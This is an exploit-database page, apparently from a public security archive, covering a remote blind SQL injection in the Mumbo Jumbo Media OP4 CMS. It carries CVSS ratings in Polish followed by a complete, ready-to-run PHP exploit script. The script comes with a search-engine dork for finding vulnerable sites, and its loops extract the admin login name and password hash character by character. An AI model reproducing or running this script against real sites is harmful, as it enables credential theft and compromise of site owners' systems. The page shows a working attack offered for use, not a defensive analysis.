Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit

2009-03-17 / 2009-03-18
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

<?php ini_set("max_execution_time",0); print_r(' ############################################################### # # Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit # # Vulnerability discovered by: Lidloses_Auge # Exploit coded by: Lidloses_Auge # Greetz to: Free-Hack, GPM # Date: 13.04.2008 # ############################################################### # # Dork: "mumbo jumbo media" + inurl:"index.php" # Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID] # Example for "http://www.site.com/cms/index.php?id=300" # => php '.$argv[0].' http://www.site.com/cms/ 300 1 # ############################################################### '); if ($argc > 1) { print_r(' '); echo 'Searching for Admin: '; for($i=1; $i <= 50; $i++) { $temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--'); if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) { $adlen = $i; $i = 50; } } for($i=1; $i <= $adlen; $i++) { for($zahl=48; $zahl <= 122; $zahl++) { $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--'); if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) { echo chr($zahl); $zahl = 122; } if ($zahl == 57) { $zahl = 96; } } } print_r(' '); echo 'Searching for Hash: '; for($i=1; $i <= 32; $i++) { for($zahl=48; $zahl <= 102; $zahl++) { if ($check = 0) { $temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--'); if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) { $zahl = 97; $check = 1; } } $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--'); if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) { echo chr($zahl); $zahl = 102; } if ($zahl == 57) { $zahl = 97; } } $check = 0; } } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top